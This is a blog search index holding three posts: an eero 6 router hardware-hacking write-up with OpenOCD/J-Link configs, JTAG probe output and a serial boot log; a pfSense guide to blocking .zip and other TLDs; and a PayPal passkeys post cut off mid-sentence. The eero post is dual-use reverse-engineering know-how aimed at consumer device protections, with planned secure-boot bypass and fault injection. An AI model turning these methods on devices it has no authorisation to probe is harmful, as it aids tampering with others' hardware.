OpenOCD. OpenOCD provides on-chip debugging, in-system programming, memory flashing, and boundary-scan testing. It supports a broad range of debugger adapters and it\u0026rsquo;s free, the catch is sometimes it can be a pain to configure, especially when the chip your trying to debug is unknown.\nI used the latest version from and built from source.\nMy debugger.cfg adapter config for Adafruit FT232H (USB type-c) device:\n# FT232H based USB-serial adaptor # # TCK: D0 # TDI: D1 # TDO: D2 # TMS: D3 # TRST: D4 # SRST: D5 # RTCK: D7 # speed adapter speed 1000 # Setup driver type adapter driver ftdi # Common PID for FT232H ftdi vid_pid 0x0403 0x6014 ftdi layout_init 0x0078 0x017b # Set sampling to allow higher clock speed ftdi tdo_sample_edge falling # Reset pins #ftdi layout_signal nTRST -ndata 0x0010 -noe 0x0040 #ftdi layout_signal nSRST -ndata 0x0020 -noe 0x0040 # debug mode either jtag or swd transport select jtag #transport select swd #reset_config trst_only I used a simple \u0026ldquo;probe\u0026rdquo; config for JTAG probe_jtag.cfg to identify chip IDs:\n# JTAG adapter settings script debugger.cfg #scan_chain init dap info shutdow JTAG naz@rasp4:~ $ sudo openocd -f debugger.cfg -f probe_jtag.cfg Open On-Chip Debugger 0.12.0+dev-01082-gfc30feb51 (2023-03-12-23:07) Licensed under GNU GPL v2 For bug reports, read http://openocd.org/doc/doxygen/bugs.html trst_only separate trst_push_pull Info : clock speed 1000 kHz Warn : There are no enabled taps. AUTO PROBING MIGHT NOT WORK!! Info : JTAG tap: auto0.tap tap/device found: 0x5ba00477 (mfg: 0x23b (ARM Ltd), part: 0xba00, ver: 0x5) Info : JTAG tap: auto1.tap tap/device found: 0x001390e1 (mfg: 0x070 (Qualcomm), part: 0x0139, ver: 0x0) Warn : AUTO auto0.tap - use \u0026#34;jtag newtap auto0 tap -irlen 4 -expected-id 0x5ba00477\u0026#34; Warn : AUTO auto1.tap - use \u0026#34;jtag newtap auto1 tap -irlen 11 -expected-id 0x001390e1\u0026#34; Warn : gdb services need one or more targets defined shutdown command invoked OpenOCD found two TAP devices with the chip IDs 0x5ba00477 and 0x001390e1. I then used these values to attempted to create a new config file which tried to invoke these TAP interface.\nHere\u0026rsquo;s my fourth attempt after reading wrongbaud\u0026rsquo;s post several times:\n# Name of the SoC if { [info exists CHIPNAME] } { set _CHIPNAME $CHIPNAME } else { set _CHIPNAME qualcomm } # This is the TAP ID that we discovered in the previous step if { [info exists CPUTAPID] } { set _CPUTAPID $CPUTAPID } else { set _CPUTAPID 0x5ba00477 } # Unknown at this point #reset_config trst_only #reset_config srst_only # Here we create the JTAG TAP/DAP, defining the location and characteristics of our DAP # add -ignore-syspwrupack jtag newtap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID dap create $_CHIPNAME.dap -chain-position $_CHIPNAME.cpu -ignore-syspwrupack -adiv6 jtag newtap auto0 tap -irlen 11 -ircapture 0x1 -expected-id 0x001390e1 dap create auto0.dap -chain-position $_CHIPNAME.cpu -ignore-syspwrupack -adiv6 #set _TARGETNAME $_CHIPNAME.cpu #set _TARGETNAME $_CHIPNAME.cpu.0 # Sort of working target create $_CHIPNAME.dap.0 cortex_a -dap auto0.dap target create lol cortex_a -dap $_CHIPNAME.dap # Semi-working - testing #target create lol cortex_m -dap $_CHIPNAME.dap -coreid 0 #target create lol2 cortex_m -dap auto0.dap init In another terminal window, I connected to the debug interface and issued a few DAP commands:\nnaz@rasp4:~ $ nc localhost 4444 Open On-Chip Debugger \u0026gt; dap info 0 dap info 0 AP # 0x0 AP ID register 0x14770004 Type is MEM-AP AXI3 or AXI4 MEM-AP BASE 0x00000002 No ROM table present \u0026gt; dap info 1 dap info 1 JTAG-DP STICKY ERROR AP # 0x1 AP ID register 0x44770002 Type is MEM-AP APB2 or APB3 MEM-AP BASE 0x80000000 ROM table in legacy format Component base address 0x80000000 Can\u0026#39;t read component, the corresponding core might be turned off \u0026gt; dap info 2 dap info 2 AP # 0x2 AP ID register 0x24760010 Type is JTAG-AP \u0026gt; dap info 3 dap info 3 JTAG-DP STICKY ERROR AP # 0x3 AP ID register 0x24770011 Type is MEM-AP AHB3 MEM-AP BASE 0xe00ff003 Valid ROM table present Component base address 0xe00ff000 Can\u0026#39;t read component, the corresponding core might be turned off \u0026gt; dap info 4 AP # 0x4 AP ID register 0x24770011 Type is MEM-AP AHB3 MEM-AP BASE 0xe00ff003 Valid ROM table present Component base address 0xe00ff000 Peripheral ID 0x04000bb4c3 Designer is 0x23b, ARM Ltd Part is 0x4c3, Cortex-M3 ROM (ROM Table) Component class is 0x1, ROM table MEMTYPE system memory present on bus ROMTABLE[0x0] = 0xfff0f003 Component base address 0xe000e000 Peripheral ID 0x04000bb000 Designer is 0x23b, ARM Ltd Part is 0x000, Cortex-M3 SCS (System Control Space) Component class is 0xe, Generic IP component ROMTABLE[0x4] = 0xfff02003 Component base address 0xe0001000 Invalid CID 0x00000000 ROMTABLE[0x8] = 0xfff03003 Component base address 0xe0002000 Peripheral ID 0x04002bb003 Designer is 0x23b, ARM Ltd Part is 0x003, Cortex-M3 FPB (Flash Patch and Breakpoint) Component class is 0xe, Generic IP component ROMTABLE[0xc] = 0xfff01003 Component base address 0xe0000000 Invalid CID 0xb1b1b1b1 ROMTABLE[0x10] = 0xfff41002 Component not present ROMTABLE[0x14] = 0xfff42003 Component base address 0xe0041000 Peripheral ID 0x04003bb924 Designer is 0x23b, ARM Ltd Part is 0x924, Cortex-M3 ETM (Embedded Trace) Component class is 0x9, CoreSight component Type is 0x13, Trace Source, Processor ROMTABLE[0x18] = 0xfff45003 Component base address 0xe0044000 Peripheral ID 0x04004bb906 Designer is 0x23b, ARM Ltd Part is 0x906, CoreSight CTI (Cross Trigger) Component class is 0x9, CoreSight component Type is 0x14, Debug Control, Trigger Matrix Dev Arch is 0x8ef00a14, DSL Memory \u0026#34;unknown\u0026#34; rev.0 ROMTABLE[0x1c] = 0x00000000 End of ROM table Sadly, it looks like we don\u0026rsquo;t have access to all cores or that they have been disabled based on the JTAG-DP STICKY ERROR error. I was able to get a ram dump of some other component but it wasn\u0026rsquo;t the NAND flash where the device firmware is stored (disappointing).\nSWD To make SWD interface work properly with Adafruit FTDI 232H, I had to short pins D1 and D2 using a 330 Ohm resistor. Here\u0026rsquo;s what the wiring looked like:\nPin 4 was connected to D0 Pin 2 was connected to D1 And here\u0026rsquo;s the output produced by openocd:\nnaz@rasp4:~ $ sudo openocd -f probe_swd.cfg Open On-Chip Debugger 0.12.0+dev-01082-gfc30feb51 (2023-03-12-23:07) Licensed under GNU GPL v2 For bug reports, read http://openocd.org/doc/doxygen/bugs.html Info : FTDI SWD mode enabled Info : Listening on port 6666 for tcl connections Info : Listening on port 4444 for telnet connections Info : clock speed 200 kHz Info : SWD DPIDR 0x5ba02477 Warn : gdb services need one or more targets defined Strangely, the ID 0x5ba02477 was not the same as the one I saw earlier while trying to brute force.\nBonus (using J-link EDU) I got annoyed at openocd - probably because I don\u0026rsquo;t know how to use it properly. So I decided to try a different one. I bought the industry standard JTAG debugger, the Segger J-Link debug adapter. I found a EDU mini on sale for around £60 on mouser.co.uk.\nBut I was still unsuccessful at getting the CPU to halt execution. Here\u0026rsquo;s the output:\nSEGGER J-Link Commander V7.88c (Compiled May 16 2023 15:45:34) DLL version V7.88c, compiled May 16 2023 15:43:58 Connecting to J-Link via USB...O.K. Firmware: J-Link EDU Mini V1 compiled May 16 2023 10:45:21 Hardware version: V1.00 J-Link uptime (since boot): 0d 00h 14m 51s S/N: 801044989 License(s): FlashBP, GDB USB speed mode: Full speed (12 MBit/s) VTref=3.266V Type \u0026#34;connect\u0026#34; to establish a target connection, \u0026#39;?\u0026#39; for help J-Link\u0026gt;connect Please specify device / core. \u0026lt;Default\u0026gt;: ARM7 Type \u0026#39;?\u0026#39; for selection dialog Device\u0026gt;? Please specify target interface: J) JTAG (Default) S) SWD T) cJTAG TIF\u0026gt;j Device position in JTAG chain (IRPre,DRPre) \u0026lt;Default\u0026gt;: -1,-1 =\u0026gt; Auto-detect JTAGConf\u0026gt; Specify target interface speed [kHz]. \u0026lt;Default\u0026gt;: 4000 kHz Speed\u0026gt;200 Device \u0026#34;CORTEX-M3\u0026#34; selected. Connecting to target via JTAG TotalIRLen = 15, IRPrint = 0x0011 JTAG chain detection found 2 devices: #0 Id: 0x5BA00477, IRLen: 04, CoreSight JTAG-DP #1 Id: 0x001390E1, IRLen: 11, Unknown device DAP: Could not power-up system power domain. DPv0 detected Scanning AP map to find all available APs AP[5]: Stopped AP scan as end of AP map has been reached AP[0]: AXI-AP (IDR: 0x14770004) AP[1]: APB-AP (IDR: 0x44770002) AP[2]: JTAG-AP (IDR: 0x24760010) AP[3]: AHB-AP (IDR: 0x24770011) AP[4]: AHB-AP (IDR: 0x24770011) Iterating through AP map to find AHB-AP to use AP[0]: Skipped. Not an AHB-AP AP[1]: Skipped. Not an AHB-AP AP[2]: Skipped. Not an AHB-AP AP[3]: Skipped. Invalid implementer code read from CPUIDVal[31:24] = 0x00 AP[4]: Core found AP[4]: AHB-AP ROM base: 0xE00FF000 CPUID register: 0x412FC231. Implementer code: 0x41 (ARM) Found Cortex-M3 r2p1, Little endian. FPUnit: 6 code (BP) slots and 2 literal slots CoreSight components: ROMTbl[0] @ E00FF000 [0][0]: E000E000 CID B105E00D PID 000BB000 SCS [0][1]: E0001000 CID B105E00D PID 003BB002 DWT [0][2]: E0002000 CID B105E00D PID 002BB003 FPB [0][3]: E0000000 CID B105E00D PID 003BB001 ITM [0][5]: E0041000 CID B105900D PID 003BB924 ETM-M3 [0][6]: E0044000 CID B105900D PID 004BB906 CTI Memory zones: Zone: \u0026#34;Default\u0026#34; Description: Default access mode Cortex-M3 identified. J-Link\u0026gt; J-Link\u0026gt;JTAGId JTAG Id: 0x5BA00477 Version: 0x5 Part no: 0xba00 Man. Id: 023B J-Link\u0026gt;reset Reset delay: 0 ms Reset type NORMAL: Resets core \u0026amp; peripherals via SYSRESETREQ \u0026amp; VECTRESET bit. Reset: Halt core after reset via DEMCR.VC_CORERESET. Reset: Reset device via AIRCR.SYSRESETREQ. Reset: CPU may have not been reset (DHCSR.S_RESET_ST never gets set). Reset: Using fallback: Reset pin. Reset: Halt core after reset via DEMCR.VC_CORERESET. Reset: Reset device via reset pin Reset: VC_CORERESET did not halt CPU. (Debug logic also reset by reset pin?). Reset: Reconnecting and manually halting CPU. DAP: Could not power-up system power domain. DPv0 detected AP map detection skipped. Manually configured AP map found. AP[0]: MEM-AP (IDR: Not set) AP[1]: MEM-AP (IDR: Not set) AP[2]: MEM-AP (IDR: Not set) AP[3]: MEM-AP (IDR: Not set) AP[4]: AHB-AP (IDR: Not set) AP[4]: Core found AP[4]: AHB-AP ROM base: 0xE00FF000 CPUID register: 0x412FC231. Implementer code: 0x41 (ARM) Found Cortex-M3 r2p1, Little endian. CPU could not be halted Reset: Core did not halt after reset, trying to disable WDT. Reset: Halt core after reset via DEMCR.VC_CORERESET. Reset: Reset device via reset pin Reset: VC_CORERESET did not halt CPU. (Debug logic also reset by reset pin?). Reset: Reconnecting and manually halting CPU. DAP: Could not power-up system power domain. DPv0 detected AP map detection skipped. Manually configured AP map found. AP[0]: MEM-AP (IDR: Not set) AP[1]: MEM-AP (IDR: Not set) AP[2]: MEM-AP (IDR: Not set) AP[3]: MEM-AP (IDR: Not set) AP[4]: AHB-AP (IDR: Not set) AP[4]: Core found AP[4]: AHB-AP ROM base: 0xE00FF000 CPUID register: 0x412FC231. Implementer code: 0x41 (ARM) Found Cortex-M3 r2p1, Little endian. CPU could not be halted CPU could not be halted ****** Error: Failed to halt CPU. J-Link\u0026gt; At this point I figured it\u0026rsquo;s time to move on, as I wasn\u0026rsquo;t getting anywhere. It\u0026rsquo;s very possible that an additional pin must be pulled up or down that activates the JTAG interface, but who knows\u0026hellip; probably the manfacturers do.\nSerial Those three pins on the top of the device were indeed a serial or UART interface, and after setting the correct baudrate 115200 and TX \u0026amp; RX pins I was presented with the following output during bootup:\nFormat: Log Type - Time(microsec) - Message - Optional Info Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic S - QC_IMAGE_VERSION_STRING=BOOT.XF.0.3-00089-IPQ60xxLZB-2 S - IMAGE_VARIANT_STRING=IPQ6018LA S - OEM_IMAGE_VERSION_STRING=crm-ubuntu20 S - Boot Interface: eMMC S - Secure Boot: On S - Boot Config @ 0x000a602c = 0x000002e3 S - JTAG ID @ 0x000a607c = 0x001390e1 S - OEM ID @ 0x000a6080 = 0x007ab15b S - Serial Number @ 0x000a4128 = 0x808edc43 S - Feature Config Row 0 @ 0x000a4130 = 0x0000800018200021 S - Feature Config Row 1 @ 0x000a4138 = 0x02c3e83783000009 S - PBL Patch Ver: 1 S - I-cache: On S - D-cache: On B - 3413 - PBL, Start B - 592 - bootable_media_detect_entry, Start B - 4339 - bootable_media_detect_success, Start B - 52365 - elf_loader_entry, Start B - 52535 - auth_hash_seg_entry, Start B - 53716 - auth_hash_seg_exit, Start B - 63087 - elf_segs_hash_verify_entry, Start B - 89985 - elf_segs_hash_verify_exit, Start B - 94168 - auth_xbl_sec_hash_seg_entry, Start B - 94313 - auth_xbl_sec_hash_seg_exit, Start B - 100648 - xbl_sec_segs_hash_verify_entry, Start B - 100649 - xbl_sec_segs_hash_verify_exit, Start B - 101578 - PBL, End B - 86528 - SBL1, Start B - 219935 - GCC [RstStat:0x0, RstDbg:0x600000] WDog Stat : 0x4 B - 222375 - clock_init, Start D - 2806 - clock_init, Delta B - 230915 - boot_flash_init, Start D - 32116 - boot_flash_init, Delta B - 266417 - sbl1_ddr_set_default_params, Start D - 335 - sbl1_ddr_set_default_params, Delta B - 272822 - boot_config_data_table_init, Start D - 2287 - boot_config_data_table_init, Delta - (575 Bytes) B - 281942 - CDT Version:2,Platform ID:8,Major ID:3,Minor ID:2,Subtype:144 B - 287523 - Image Load, Start D - 6618 - OEM_MISC Image Loaded, Delta - (0 Bytes) B - 297009 - Image Load, Start D - 5063 - PMIC Image Loaded, Delta - (0 Bytes) B - 304878 - sbl1_ddr_set_params, Start B - 309941 - CPR configuration: 0x366 B - 313052 - Pre_DDR_clock_init, Start D - 183 - Pre_DDR_clock_init, Delta D - 0 - sbl1_ddr_set_params, Delta B - 348005 - Image Load, Start D - 427 - APDP Image Loaded, Delta - (0 Bytes) B - 366122 - Image Load, Start D - 427 - QTI_MISC Image Loaded, Delta - (0 Bytes) B - 368714 - Image Load, Start D - 7778 - Auth Metadata D - 610 - Segments hash check D - 19886 - QSEE Dev Config Image Loaded, Delta - (36498 Bytes) B - 390705 - Image Load, Start D - 13176 - Auth Metadata D - 10279 - Segments hash check D - 101626 - QSEE Image Loaded, Delta - (1435236 Bytes) B - 492758 - Image Load, Start D - 7625 - Auth Metadata D - 1006 - Segments hash check D - 22295 - RPM Image Loaded, Delta - (102676 Bytes) B - 516395 - Image Load, Start D - 7564 - Auth Metadata D - 3233 - Segments hash check D - 37058 - APPSBL Image Loaded, Delta - (576208 Bytes) B - 581940 - SBL1, End D - 495717 - SBL1, Delta S - Flash Throughput, 39000 KB/s (2151865 Bytes, 54250 us) S - Core 0 Frequency, 800 MHz S - DDR Frequency, 466 MHz eero u-boot 1.2.7-0d393c56b2-l (Dec 11 2021 - 04:44:51 +0000) DRAM: smem ram ptable found: ver: 2 len: 4 512 MiB NAND: Could not find nand-flash in device tree SF: Unsupported flash IDs: manuf 00, jedec 0000, ext_jedec 0000 ipq_spi: SPI Flash not found (bus/cs/speed/mode) = (0/0/48000000/0) 0 MiB MMC: \u0026lt;NULL\u0026gt;: 0 (eMMC) PCI0 is not defined in the device tree In: serial@78B1000 Out: serial@78B1000 Err: serial@78B1000 model: [andytown-g] machid: 8030290 eth0 MAC Address from ART is not valid eth1 MAC Address from ART is not valid eth2 MAC Address from ART is not valid eth3 MAC Address from ART is not valid eth4 MAC Address from ART is not valid eth5 MAC Address from ART is not valid board_register_value should be: 05 Net: MAC0 addr:0:3:7f:ba:db:ad PHY ID1: 0x4d PHY ID2: 0xd0b2 EDMA ver 1 hw init Num rings - TxDesc:1 (0-0) TxCmpl:1 (0-0) RxDesc:1 (15-15) RxFill:1 (7-7) ipq6018_edma_alloc_rings: successfull ipq6018_edma_setup_ring_resources: successfull ipq6018_edma_configure_rings: successfull ipq6018_edma_hw_init: successfull eth0 Warning: eth0 MAC addresses don\u0026#39;t match: Address in SROM is 00:03:7f:ba:db:ad Address in environment is c0:36:53:c5:1b:80 eero_boot:bootdelay enforced [0] Hit any key to stop autoboot: 0 USB0: Register 2000140 NbrPorts 2 Starting the controller USB XHCI 1.10 scanning bus 0 for devices... 1 USB Device(s) found USB1: Register 1000140 NbrPorts 1 Starting the controller USB XHCI 1.10 scanning bus 1 for devices... 1 USB Device(s) found eero_boot:network boot disabled eero_boot:booting usb eero_boot:booting mmc eero_boot:loading [eero_kernel.mbn] from partition [0:10] sha1+ ## Loading kernel from FIT Image at 44000000 ... Using \u0026#39;conf@qcom-ipq6018-andytown-g.dtb\u0026#39; configuration Trying \u0026#39;kernel-1\u0026#39; kernel subimage Description: Linux kernel Type: Kernel Image Compression: gzip compressed Data Start: 0x44000104 Data Size: 14904410 Bytes = 14.2 MiB Architecture: ARM OS: Linux Load Address: 0x41208000 Entry Point: 0x41208000 Hash algo: sha1 Hash value: 60081f4bab9232d1eb5347fe9274ccdda856984d Verifying Hash Integrity ... sha1+ OK ## Loading fdt from FIT Image at 44000000 ... Using \u0026#39;conf@qcom-ipq6018-andytown-g.dtb\u0026#39; configuration Trying \u0026#39;fdt-qcom-ipq6018-andytown-g.dtb\u0026#39; fdt subimage Description: Flattened Device Tree blob Type: Flat Device Tree Compression: uncompressed Data Start: 0x44e36e6c Data Size: 70023 Bytes = 68.4 KiB Architecture: ARM Hash algo: sha1 Hash value: 0d37e519497e619feb18fb237b7041cf703daae0 Verifying Hash Integrity ... sha1+ OK Booting using the fdt blob at 0x44e36e6c Uncompressing Kernel Image ... OK Loading Device Tree to 484eb000, end 484ff186 ... OK Could not find PCI in device tree Using machid 0x8030290 from environment Starting kernel ... [ 0.000000] Booting Linux on physical CPU 0x0 [ 0.000000] Initializing cgroup subsys cpuset [ 0.000000] Initializing cgroup subsys cpu [ 0.000000] Initializing cgroup subsys cpuacct [ 0.000000] Linux version 4.4.60-yocto-standard-eero (oe-user@oe-host) (gcc version 9.3.0 (GCC) ) #1 SMP PREEMPT Fri Feb 3 04:36:19 UTC 2023 [ 0.000000] CPU: ARMv7 Processor [51af8014] revision 4 (ARMv7), cr=10c0383d [ 0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache [ 0.000000] Machine model: andytown-g [ 0.000000] Ignoring memory range 0x40000000 - 0x41000000 [ 0.000000] cma: Reserved 28 MiB at 0x5e400000 [ 0.000000] Memory policy: Data cache writealloc [ 0.000000] psci: probing for conduit method from DT. [ 0.000000] psci: PSCIv1.0 detected in firmware. [ 0.000000] psci: Using standard PSCI v0.2 function IDs [ 0.000000] psci: MIGRATE_INFO_TYPE not supported. [ 0.000000] PERCPU: Embedded 11 pages/cpu @9cf30000 s15436 r8192 d21428 u45056 [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 110244 [ 0.000000] Kernel command line: ro systemd.verity_root_data=/dev/mmcblk0p18 systemd.verity_root_hash=/dev/loop10 roothash=d03330e57280e4481417b8146dc2be5af2559dfca299e67a4415fcb7e5305f7b fsck.repair=yes swiotlb=1 coherent_pool=2M [ 0.000000] PID hash table entries: 2048 (order: 1, 8192 bytes) [ 0.000000] Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) [ 0.000000] Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) [ 0.000000] Memory: 389508K/445440K available (6315K kernel code, 483K rwdata, 2056K rodata, 11264K init, 366K bss, 27260K reserved, 28672K cma-reserved, 0K highmem) [ 0.000000] Virtual kernel memory layout: [ 0.000000] vector : 0xffff0000 - 0xffff1000 ( 4 kB) [ 0.000000] fixmap : 0xffc00000 - 0xfff00000 (3072 kB) [ 0.000000] vmalloc : 0x9f800000 - 0xff800000 (1536 MB) [ 0.000000] lowmem : 0x80000000 - 0x9f000000 ( 496 MB) [ 0.000000] pkmap : 0x7fe00000 - 0x80000000 ( 2 MB) [ 0.000000] modules : 0x7f000000 - 0x7fe00000 ( 14 MB) [ 0.000000] .text : 0x80208000 - 0x80b2ce44 (9364 kB) [ 0.000000] .init : 0x80c00000 - 0x81700000 (11264 kB) [ 0.000000] .data : 0x81700000 - 0x81778d0c ( 484 kB) [ 0.000000] .bss : 0x8177b000 - 0x817d6858 ( 367 kB) [ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1 [ 0.000000] Preemptible hierarchical RCU implementation. [ 0.000000] Build-time adjustment of leaf fanout to 32. [ 0.000000] NR_IRQS:16 nr_irqs:16 16 [ 0.000000] Architected cp15 timer(s) running at 24.00MHz (virt). [ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x588fe9dc0, max_idle_ns: 440795202592 ns [ 0.000005] sched_clock: 56 bits at 24MHz, resolution 41ns, wraps every 4398046511097ns [ 0.000016] Switching to timer-based delay loop, resolution 41ns [ 0.000672] Calibrating delay loop (skipped), value calculated using timer frequency.. 48.00 BogoMIPS (lpj=240000) [ 0.000684] pid_max: default: 32768 minimum: 301 [ 0.000776] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.000786] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.001305] Initializing cgroup subsys io [ 0.001322] Initializing cgroup subsys memory [ 0.001346] Initializing cgroup subsys devices [ 0.001361] Initializing cgroup subsys freezer [ 0.001371] Initializing cgroup subsys net_cls [ 0.001381] Initializing cgroup subsys pids [ 0.001403] CPU: Testing write buffer coherency: ok [ 0.001765] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000 [ 0.001815] Setting up static identity map for 0x41300000 - 0x41300058 [ 0.054348] MSM Memory Dump base table set up [ 0.054373] MSM Memory Dump apps data table set up [ 0.090260] CPU1: thread -1, cpu 1, socket 0, mpidr 80000001 [ 0.120242] CPU2: thread -1, cpu 2, socket 0, mpidr 80000002 [ 0.150274] CPU3: thread -1, cpu 3, socket 0, mpidr 80000003 [ 0.150328] Brought up 4 CPUs [ 0.150349] SMP: Total of 4 processors activated (192.00 BogoMIPS). [ 0.150355] CPU: All CPU(s) started in SVC mode. [ 0.150739] devtmpfs: initialized [ 0.168648] VFP support v0.3: implementor 51 architecture 3 part 40 variant 3 rev 4 [ 0.168950] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns [ 0.168976] futex hash table entries: 1024 (order: 4, 65536 bytes) [ 0.170182] pinctrl core: initialized pinctrl subsystem [ 0.171312] NET: Registered protocol family 16 [ 0.173008] DMA: preallocated 2048 KiB pool for atomic coherent allocations [ 0.200103] cpuidle: using governor ladder [ 0.230121] cpuidle: using governor menu [ 0.230307] NET: Registered protocol family 42 [ 0.245022] irq: no irq domain found for /soc/smp2p-wcss/slave-kernel ! [ 0.248057] irq: no irq domain found for /soc/smp2p-wcss/slave-kernel ! [ 0.257030] hw-breakpoint: found 5 (+1 reserved) breakpoint and 4 watchpoint registers. [ 0.257039] hw-breakpoint: maximum watchpoint size is 8 bytes. [ 0.258847] CPU: IPQ6000, SoC Version: 1.0 [ 0.259603] qcom,cpr4-apss-regulator b018000.cpr4-ctrl: CPR valid fuse count: 4 [ 0.260563] IPC logging disabled [ 0.260569] IPC logging disabled [ 0.260574] IPC logging disabled [ 0.260579] IPC logging disabled [ 0.260583] IPC logging disabled [ 0.260852] sps:sps is ready. [ 0.261582] console [pstore0] enabled [ 0.261590] pstore: Registered ramoops as persistent store backend [ 0.261599] ramoops: attached 0x100000@0x50100000, ecc: 0/0 ----[CUT]---- You can find the full serial log at eero-6-serial-output.txt\nFrom the serial output, we know that:\nUses U-Boot version 1.2.7-0d393c56b2-l Secure boot enabled Can\u0026rsquo;t interrupt boot sequence :( SoC is a Qualcomm IPQ6000 datasheet - requires virtual points :( Summary This was an on and off project, that lasted a few months, where I would find time after my day job. I\u0026rsquo;ve learned a lot but there\u0026rsquo;s still more to learn. This project definately sparked my curiosity into hardware hacking again. But I can\u0026rsquo;t say I wasn\u0026rsquo;t a bit disappointed at not being to extract the flash firmware or getting a shell. Maybe in part 2 ;)\nI hope somebody finds this post useful and that they can continue research.\nNext steps Try bypass the U-BOOT secure boot protection, to at least get a shell through interrupting the boot process or dump the firmware image. Figure out the right sequence for configuring the JTAG interface and halt the main CPU. Test out fault injection attacks. De-solider the Kingston (EMMC04G-M627) NAND chip to extract the firmware.\nFurther reading Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction I Hack, U-BOOT Hacking the Apple AirTags Def Con 29 by Thomas Roth (stacksmashing) ","permalink":"https://markuta.com/eero-6-hacking-part-1/","title":"Hacking Amazon's eero 6 (part 1)"},{"categories":null,"contents":"A short guide on how to block the entire .zip TLD using pfSense. In particular using a package called pfBlocker-NG, which can be thought of as a \u0026ldquo;PiHole\u0026rdquo; alternative. pfBlocker-NG is capable of much much more but won\u0026rsquo;t be covered in this blog.\nWhy is .zip TLD a problem? It\u0026rsquo;s simple really, Phishing. Whether it\u0026rsquo;s abusing a HTTP URI scheme or using special unicode characters, having a .zip TLD which has always been attributed to the compression file extension is just a bad idea.\nHere are some excellent resources explaining the problem in greater detail:\nThe Dangers of Google’s .zip TLD - the author mentions a bug reported in Chromium which allow hostnames containing U+2044 (⁄) and U+2215 (∕), which is almost identical to the forward slash (/) in URL PATHs. And can be used to trick users. Zip domains, a bad idea nobody asked for - also references the above. google-zip-mov-domains-social-engineers-shiny-new-tool - mentions there hasn\u0026rsquo;t been active abuse (yet). Install package Note: It\u0026rsquo;s now recommended to install the pfBlockerNG version rather than pfBlockerNG-devel version, since both versions have synced up.\nOn your pfSense admin panel, go to System and Package Manager.\nSelect Available Packages and make sure it\u0026rsquo;s the latest then hit Install.\nConfigure package A new option will now be available under the Firewall menu called pfBlockerNG.\nGo to the DNSBL pane and make sure these options are enabled:\nEnable DNSBL Wildcard Blocking (TLD) Whilst on the same page scroll down until you see TLD Blacklist/Whitelist and expand it. Next, add your chosen TLD to the TLD Blacklist input field (without the dot). You can block multiple TLDs, but it must be separated one per line e.g.\nzip mov pw zw ke quest support When you\u0026rsquo;re done click Save DNSBL settings.\nThe final step is to reload the settings by going to Update (still in the pfBlockerNG menu) and clicking on Reload. If you don\u0026rsquo;t it\u0026rsquo;ll update in 1 hour automatically by default.\nConfirming Browser When any of the devices on my network try access a .zip domain, they\u0026rsquo;ll get an error. Or more specifically the domain will resolve to an internal address which shows a this site has been blocked message.\nThis page also can be customised by modifying dnsbl_active.php file located in:\n/usr/local/www/pfblockerng/www/dnsbl_active.php DNS lookup pfBlockerNG was configured to use a IP range outside my VLAN. All the blocked domains will resolve to 10.10.10.1. Here\u0026rsquo;s an example of using the dig utility:\n➜ ~ dig +short nic.zip 10.10.10.1 ➜ ~ dig +short 124.zip 10.10.10.1 ➜ ~ dig +short latest.zip 10.10.10.1 ➜ ~ dig +short stable.zip 10.10.10.1 ➜ ~ dig +short winrar.zip 10.10.10.1 Other misused TLDs In 2021, Palo Alto\u0026rsquo;s Unit 42 threat intelligence team published a blog about their research of popular top-level domains used in cyber crime. The team looked at several different TLDs across six categories (Malicious, Phishing, Malware, Grayware, C2, and Sensitive).\nA table from Palo Alto\u0026rsquo;s blog of TLDs with the highest number of malicious domains:\n","permalink":"https://markuta.com/blocking-zip-domains/","title":"How to block .zip domains with pfSense"},{"categories":null,"contents":"PayPal\u0026rsquo;s Help Center - Technical Support post shows how Passkeys work on its platform and how users can add new security devices, this covers both iOS and Android but also desktop systems too. It also goes into more detail on what to do when you\u0026rsquo;ve lost your device, and much more.\nTL;DR: As of 26th May 2023, PayPal only supports external security \u0026ldquo;Passkeys\u0026rdquo; keys (such as Yubikeys) for two-factor authentication. Passkeys on mobile devices like iOS or Android still do NOT work, even though you can register one. I am based in the UK, but US users have also experienced these same issues.\nUpdate 2025/04/16: PayPal has fixed the issues and users are now able to register and login via passkeys authentication method. I have confirmed this using my personal mobile device.\nIt only took 2 years ;)\nRegistering a device To register a Passkey log-in into your PayPal account and go to Account Profile, then Security and 2-step verification, select update. You will then be presented with this browser window:\nOut of the two options: Use a phone or tablet or USB security key. I opted to use my iPhone as a security device, since Apple introduced support for Passkeys in iOS 16. A QR code is presented where users use their device\u0026rsquo;s camera to save to their iCloud account.\nNote: The QR code disappears almost immediately, making it really difficult to add a Passkey to a mobile device in the first place. I did manage to add it to my iPhone running (iOS 16.5) but only after several attempts.\nUpon \u0026ldquo;successful\u0026rdquo; registration, you\u0026rsquo;ll receive a confirmation email that a new FIDO key has been enrolled to your account. And that you will need to use this option moving forward.\nTrying to log-in I tried three attempts using a security key to log-in:\na desktop (MacBook Air running macOS 12.6.5) a mobile device (iPhone 12 running iOS 16.5) a Yubikey 5C Desktop device On my MacBook Air, after entering my username and password I needed to select Try another way on the 2FA page, as I have not selected the Passkey as the default option.\nWhat I expect is my security device (iPhone) to get some kind of notification regarding the authentication request. Instead, I get browser dialog which states \u0026ldquo;Insert your security key and touch it\u0026rdquo; and no other options. This request will ultimately time-out and fail.\nI am forced to cancel this authentication request and use my Authenticator app instead.\nMobile device Trying to log-in using my iPhone (Safari), again much like the previous authentication steps. But this time I get an error stating security keys are only supported on \u0026ldquo;Desktop devices\u0026rdquo;, even though I can register one.\nVery confusing.\nYubikey Registering a Yubikey was straight forward, and the log-in process worked well. This was the only option that worked successfully.\nPayPal community discussions A post on the PayPal\u0026rsquo;s community discussion forum shows other users experiencing the 